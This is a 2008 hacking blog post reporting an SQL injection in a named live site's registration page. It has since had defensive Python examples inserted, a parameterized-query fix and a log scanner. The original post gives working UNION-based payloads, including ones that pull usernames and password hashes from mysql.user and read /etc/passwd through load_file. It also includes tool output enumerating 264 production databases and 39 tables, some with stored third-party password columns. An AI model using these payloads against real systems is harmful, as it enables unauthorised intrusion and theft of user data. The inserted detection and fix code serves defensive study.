viperfx07 is here to blog about hacking, cracking, websites, applications, Android, and much more.

Monday, November 24, 2008

[SQLi] http://www.grouply.com

5:53 PM Posted by viperfx07
Intro: it's like the http://www.faniq.com case: I'm tired of being invited to join sites that aren't even useful to me :) I decided to check and, again, voila, it's vulnerable :)

PoC: http://www.grouply.com/register.php?rem=[SQLi]
Demo: http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3/*
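
Added example (not part of the original post, and not grouply's code, which the post never shows): the string-concatenation bug class the PoC above relies on, next to the parameter-bound version that closes it. SQLite stands in for the site's MySQL 5.0, and the `invitations` table with its four columns is a made-up schema chosen only to match the 4-column UNION in the Demo URL; the `rem` parameter name and the payload itself are the ones from the post.

```python
import sqlite3

# Payload copied from the post's PoC ("rem" is the register.php parameter the
# post injects into). SQLite stands in for the site's MySQL 5.0 here; both treat
# /**/ as whitespace and a trailing /* as a comment that swallows the rest.
PAYLOAD = "25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3/*"


def make_db():
    """Build a throwaway in-memory database with a hypothetical table.

    The post never shows grouply's real query or schema; 'invitations' and its
    four columns are an assumption chosen to match the 4-column UNION in the PoC.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE invitations (code TEXT, email TEXT, name TEXT, status TEXT)"
    )
    # One constructed row; the code value is the one used in the post's PoC.
    conn.execute(
        "INSERT INTO invitations VALUES "
        "('25271879', 'alice@example.invalid', 'Alice', 'pending')"
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, rem):
    """Build the query by string concatenation (the bug class the post reports).

    The client's quote closes the literal, AND 1=2 empties the real result,
    UNION SELECT appends client-chosen columns, and the trailing /* comments
    out the closing quote the application itself appends.
    """
    sql = (
        "SELECT code, email, name, status FROM invitations WHERE code = '"
        + rem
        + "'"
    )
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, rem):
    """Same lookup with a bound parameter: the value is data, never SQL."""
    sql = "SELECT code, email, name, status FROM invitations WHERE code = ?"
    return conn.execute(sql, (rem,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload :", lookup_vulnerable(db, PAYLOAD))  # [(0, 1, 2, 3)]
    print("fixed, payload      :", lookup_fixed(db, PAYLOAD))       # []
    print("fixed, real code    :", lookup_fixed(db, "25271879"))
```

With the bound parameter the whole payload is compared against the `code` column as one opaque string and no row matches, so nothing the caller puts in `rem` can change the statement's shape. The same fix in PHP against MySQL is a prepared statement (mysqli or PDO with placeholders); escaping the quote alone is not equivalent, because it still leaves the query built by concatenation.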

Database info:
[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:42:27
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,concat(user,0x3a,password),3/**/FROM/**/mysql.user/*

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,load_file(0x2f6574632f706173737764),3/*

[-] [17:42:30]
[-] Total URL Requests 3
[-] Done
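
Added example from the defender's side (not part of the original post and not the tool whose output is shown above): a small log scanner that undoes the "/**/" and "/*" evasion the tool reports, then flags the request shapes visible in the URLs above (quote breakout, UNION SELECT, reads from mysql.user, load_file). The access-log lines are constructed for this example in Apache style; the three injected requests reuse the post's payloads and the two benign lines are there to show the rules stay quiet on normal traffic. The hex decoder exists so an analyst sees what a 0x... literal spelled out, e.g. the load_file argument above.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache-style access-log lines (not taken from the post's tool
# output). The injected requests reuse the payload shapes shown in the post so
# the rules can be checked against them; the first and last lines are benign
# traffic that must not fire.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Nov/2008:17:42:27 +0000] "GET /register.php?rem=25271879 HTTP/1.1" 200 512
10.0.0.5 - - [24/Nov/2008:17:42:28 +0000] "GET /register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3/* HTTP/1.1" 200 734
10.0.0.5 - - [24/Nov/2008:17:42:29 +0000] "GET /register.php?rem=25271879%27/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,concat(user,0x3a,password),3/**/FROM/**/mysql.user/* HTTP/1.1" 200 812
10.0.0.5 - - [24/Nov/2008:17:42:30 +0000] "GET /register.php?rem=25271879%27/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,load_file(0x2f6574632f706173737764),3/* HTTP/1.1" 200 990
10.0.0.9 - - [24/Nov/2008:17:50:01 +0000] "GET /groups.php?name=union+station HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Each rule runs against the normalised parameter value, so the /**/ evasion
# used in the post no longer hides the keywords from a plain regex.
RULES = [
    ("quote-breakout", re.compile(r"'\s*(?:and|or|union)\b")),
    ("union-select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    ("mysql-user-table", re.compile(r"\bmysql\s*\.\s*user\b")),
    ("file-read", re.compile(r"\bload_file\s*\(")),
]


def normalize(value):
    """Undo the evasion seen in the post: decode once more (double encoding),
    turn /* ... */ comments into spaces, drop an unterminated trailing /*,
    then lower-case and collapse whitespace."""
    v = unquote_plus(value)
    v = re.sub(r"/\*.*?\*/", " ", v, flags=re.S)
    v = re.sub(r"/\*.*$", " ", v, flags=re.S)
    return re.sub(r"\s+", " ", v).strip().lower()


def decode_hex_literals(value):
    """Decode MySQL 0x... literals to text so the analyst sees what was named
    (the post's load_file(0x2f6574632f706173737764) is one such literal)."""
    decoded = []
    for m in re.finditer(r"\b0x([0-9a-f]+)\b", value):
        digits = m.group(1)
        if len(digits) % 2:
            continue
        try:
            decoded.append(bytes.fromhex(digits).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def scan_log(text):
    """Return one finding per query parameter that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        for param, values in parse_qs(parts.query, keep_blank_values=True).items():
            for raw in values:
                norm = normalize(raw)
                fired = [name for name, rx in RULES if rx.search(norm)]
                if fired:
                    findings.append({
                        "client": line.split(" ", 1)[0],
                        "path": parts.path,
                        "param": param,
                        "rules": fired,
                        "decoded": decode_hex_literals(norm),
                    })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["path"], f["param"], ",".join(f["rules"]), f["decoded"])
```

Normalising before matching is the important design choice: a rule written against the raw URL would need to know about every comment and encoding trick, whereas after normalisation "UNION/**/SELECT" and "union select" are the same string. The mysql.user and load_file rules are also a reminder of what made this case worse than a plain data leak: the tool output above shows the web application's database account could read the mysql.user table and call load_file, which a least-privilege account (no rights on the mysql schema, no FILE privilege) would have prevented even with the injection present.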

[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:42:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 264

[0]mysql
[1]prod_collective
[2]prod_common
[3]prod_federated
[4]prod_postfix
[5]prod_stats
[6]prod_tmp
[7]prod_user0
[8]prod_user1
[9]prod_user10
[10]prod_user100
[11]prod_user101
[12]prod_user102
[13]prod_user103
[14]prod_user104
[15]prod_user105
[16]prod_user106
[17]prod_user107
[18]prod_user108
[19]prod_user109
[20]prod_user11
[21]prod_user110
[22]prod_user111
[23]prod_user112
[24]prod_user113
[25]prod_user114
[26]prod_user115
[27]prod_user116
[28]prod_user117
[29]prod_user118
[30]prod_user119
[31]prod_user12
[32]prod_user120
[33]prod_user121
[34]prod_user122
[35]prod_user123
[36]prod_user124
[37]prod_user125
[38]prod_user126
[39]prod_user127
[40]prod_user128
[41]prod_user129
[42]prod_user13
[43]prod_user130
[44]prod_user131
[45]prod_user132
[46]prod_user133
[47]prod_user134
[48]prod_user135
[49]prod_user136
[50]prod_user137
[51]prod_user138
[52]prod_user139
[53]prod_user14
[54]prod_user140
[55]prod_user141
[56]prod_user142
[57]prod_user143
[58]prod_user144
[59]prod_user145
[60]prod_user146
[61]prod_user147
[62]prod_user148
[63]prod_user149
[64]prod_user15
[65]prod_user150
[66]prod_user151
[67]prod_user152
[68]prod_user153
[69]prod_user154
[70]prod_user155
[71]prod_user156
[72]prod_user157
[73]prod_user158
[74]prod_user159
[75]prod_user16
[76]prod_user160
[77]prod_user161
[78]prod_user162
[79]prod_user163
[80]prod_user164
[81]prod_user165
[82]prod_user166
[83]prod_user167
[84]prod_user168
[85]prod_user169
[86]prod_user17
[87]prod_user170
[88]prod_user171
[89]prod_user172
[90]prod_user173
[91]prod_user174
[92]prod_user175
[93]prod_user176
[94]prod_user177
[95]prod_user178
[96]prod_user179
[97]prod_user18
[98]prod_user180
[99]prod_user181
[100]prod_user182
[101]prod_user183
[102]prod_user184
[103]prod_user185
[104]prod_user186
[105]prod_user187
[106]prod_user188
[107]prod_user189
[108]prod_user19
[109]prod_user190
[110]prod_user191
[111]prod_user192
[112]prod_user193
[113]prod_user194
[114]prod_user195
[115]prod_user196
[116]prod_user197
[117]prod_user198
[118]prod_user199
[119]prod_user2
[120]prod_user20
[121]prod_user200
[122]prod_user201
[123]prod_user202
[124]prod_user203
[125]prod_user204
[126]prod_user205
[127]prod_user206
[128]prod_user207
[129]prod_user208
[130]prod_user209
[131]prod_user21
[132]prod_user210
[133]prod_user211
[134]prod_user212
[135]prod_user213
[136]prod_user214
[137]prod_user215
[138]prod_user216
[139]prod_user217
[140]prod_user218
[141]prod_user219
[142]prod_user22
[143]prod_user220
[144]prod_user221
[145]prod_user222
[146]prod_user223
[147]prod_user224
[148]prod_user225
[149]prod_user226
[150]prod_user227
[151]prod_user228
[152]prod_user229
[153]prod_user23
[154]prod_user230
[155]prod_user231
[156]prod_user232
[157]prod_user233
[158]prod_user234
[159]prod_user235
[160]prod_user236
[161]prod_user237
[162]prod_user238
[163]prod_user239
[164]prod_user24
[165]prod_user240
[166]prod_user241
[167]prod_user242
[168]prod_user243
[169]prod_user244
[170]prod_user245
[171]prod_user246
[172]prod_user247
[173]prod_user248
[174]prod_user249
[175]prod_user25
[176]prod_user250
[177]prod_user251
[178]prod_user252
[179]prod_user253
[180]prod_user254
[181]prod_user255
[182]prod_user26
[183]prod_user27
[184]prod_user28
[185]prod_user29
[186]prod_user3
[187]prod_user30
[188]prod_user31
[189]prod_user32
[190]prod_user33
[191]prod_user34
[192]prod_user35
[193]prod_user36
[194]prod_user37
[195]prod_user38
[196]prod_user39
[197]prod_user4
[198]prod_user40
[199]prod_user41
[200]prod_user42
[201]prod_user43
[202]prod_user44
[203]prod_user45
[204]prod_user46
[205]prod_user47
[206]prod_user48
[207]prod_user49
[208]prod_user5
[209]prod_user50
[210]prod_user51
[211]prod_user52
[212]prod_user53
[213]prod_user54
[214]prod_user55
[215]prod_user56
[216]prod_user57
[217]prod_user58
[218]prod_user59
[219]prod_user6
[220]prod_user60
[221]prod_user61
[222]prod_user62
[223]prod_user63
[224]prod_user64
[225]prod_user65
[226]prod_user66
[227]prod_user67
[228]prod_user68
[229]prod_user69
[230]prod_user7
[231]prod_user70
[232]prod_user71
[233]prod_user72
[234]prod_user73
[235]prod_user74
[236]prod_user75
[237]prod_user76
[238]prod_user77
[239]prod_user78
[240]prod_user79
[241]prod_user8
[242]prod_user80
[243]prod_user81
[244]prod_user82
[245]prod_user83
[246]prod_user84
[247]prod_user85
[248]prod_user86
[249]prod_user87
[250]prod_user88
[251]prod_user89
[252]prod_user9
[253]prod_user90
[254]prod_user91
[255]prod_user92
[256]prod_user93
[257]prod_user94
[258]prod_user95
[259]prod_user96
[260]prod_user97
[261]prod_user98
[262]prod_user99
[263]test

[-] [17:47:11]
[-] Total URL Requests 266
[-] Done


[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:47:59
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log
[+] Showing Tables & Columns from database "prod_collective"
[+] Number of Tables: 39

[Database]: prod_collective
[Table: Columns]
[0]g_accesscode: code,enabled,category,comment
[1]g_bookmark: row_id,user_id,message_id,group_id,bookmarked_flg,note,created,last_upd_tm
[2]g_digest_stats: user_id,updated,num_messages_displayed,proc_time_secs,num_groups,highlights_tm,new_msg_query_tm,total_digest_tm
[3]g_download_task_0: row_id,created,last_upd,host,logic_proc_num,group_id,group_name,u1_user_id,u1_username,u1_y_username,u1_y_password1,u1_captcha_tm,u2_user_id,u2_username,u2_y_username,u2_y_password1,u2_captcha_tm,c0_flg,c1_flg,c2_flg,c3_flg,c4_flg,c5_flg,c6_flg,c7_flg,c8_flg,c9_flg,c10_flg,c11_flg,c12_flg,c13_flg,c14_flg,c15_flg,status0,status1,status2,status3,status4,status5,status6,status7,status8,status9,status10,status11,status12,status13,status14,status15
[4]g_download_task_1: row_id,created,last_upd,host,logic_proc_num,group_id,group_name,u1_user_id,u1_username,u1_y_username,u1_y_password1,u1_captcha_tm,u2_user_id,u2_username,u2_y_username,u2_y_password1,u2_captcha_tm,c0_flg,c1_flg,c2_flg,c3_flg,c4_flg,c5_flg,c6_flg,c7_flg,c8_flg,c9_flg,c10_flg,c11_flg,c12_flg,c13_flg,c14_flg,c15_flg,status0,status1,status2,status3,status4,status5,status6,status7,status8,status9,status10,status11,status12,status13,status14,status15
[5]g_download_track: row_id,created,type,group_name,group_id,download_msg_count,status_nc,int_x1,int_x2,int_x3,int_x4,int_x5,char_x1,char_x2,char_x3,char_x4,char_x5
[6]g_downloadmsg_proc: row_id,created,start_tm,host,pid,type,group_name,username,comments
[7]g_email_to_author: row_id,created,recipient,recipient_email,recipient_id,subject,sender_id,template_code,msg_body
[8]g_gap: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[9]g_gap_20080630: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[10]g_gap_backup: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[11]g_gap_backup20080511: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[12]g_gap_backup20080611: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[13]g_gm_dedup: row_id,shard_num,gm_id
[14]g_group_auth: row_id,group_name,group_id,auth_code,auth_tm,lockout_upd_tm
[15]g_group_auth_track: row_id,created,group_auth_id,group_name,ip,desc_text
[16]g_group_c: row_id,name,state,msg_num_d,gap_checked_msg_num,lock_status,archived_resolved_flg,archived_msg_flg,msg_status_tm,lock_status_tm
[17]g_group_member_c: row_id,group_id,user_id,y_profile_flg,group_status_tm,group_status,email_fwd_flg,email_fwd_flg_tm,email,g_email_flg
[18]g_mail: row_id,created,mail_act_id,desc_text,comments,recipient_count,to_email,group_name,f_name,l_name,status,reminder_count,par_mail_id
[19]g_mail_act: row_id,created,user_id,template_id,act_code,user_email,group_count,register_code,mail_trackid,source_page,reminded_flg,ip,comments
[20]g_mail_response: row_id,created,ip,register_code,mail_track_id,action_nc
[21]g_mail_response_invalid: row_id,created,ip,register_code,mail_track_id,action_nc
[22]g_mail_template: row_id,created,last_upd,src_type_cd,custom_flg,status,subject,desc_text,tempting_text,comments,last_upd_by
[23]g_popular_group: row_id,group_id,group_name,rank
[24]g_rating: row_id,created,user_id,group_id,message_id,first_flg,rating,last_upd_tm
[25]g_refresh_q: row_id,created,user_id,host,process_id
[26]g_tag: row_id,created,user_id,group_id,message_id,tag,seq
[27]g_tip: row_id,tip_num,desc_text,created
[28]g_uauthor_obsolete: row_id,uname,status,status_tm,group_name,msg_num
[29]g_unarchive: row_id,created,group_name,group_id,req_tm,status,status_tm,start_tm,end_tm
[30]g_update: row_id,created,user_id,group_id,message_id,update_count,last_upd_tm
[31]g_user_c: row_id,group_sync_status,group_sync_status_tm,captcha_status,captcha_ip,captcha_status_tm,sync_req_tm,lock_status,lock_status_tm,y_password_status,y_password_status_tm,download_last_tm
[32]g_user_c2: row_id,created,ref_user_id
[33]g_user_c3: row_id,created,ref_user_id,login_tm
[34]g_user_delete: row_id,created,username,confirm_email,group_count,del_req_tm,status,status_tm
[35]g_user_stats: user_id,new_user_count,entry_count,new_user_count_7d,new_user_count_30d,new_user_count_all
[36]g_view: row_id,user_id,group_id,message_id,read_flg,view_count,created,last_upd_tm
[37]g_waitinglist: time,email
[38]g_webconn_proc: row_id,created,start_tm,host,pid,logic_proc_num,status,next_new_group_cycle,last_cycle,last_status,last_run_tm,last_duration,last_msg_count,scheduled_groups,finished_groups,ok_groups,noarchive_groups,overlimit_groups,invalidpass_groups,nonenglish_groups,triplenine_groups,captcha_groups,no_user_groups,server_error_groups,other_failed_groups,comments

[-] [17:55:42]
[-] Total URL Requests 393
[-] Done
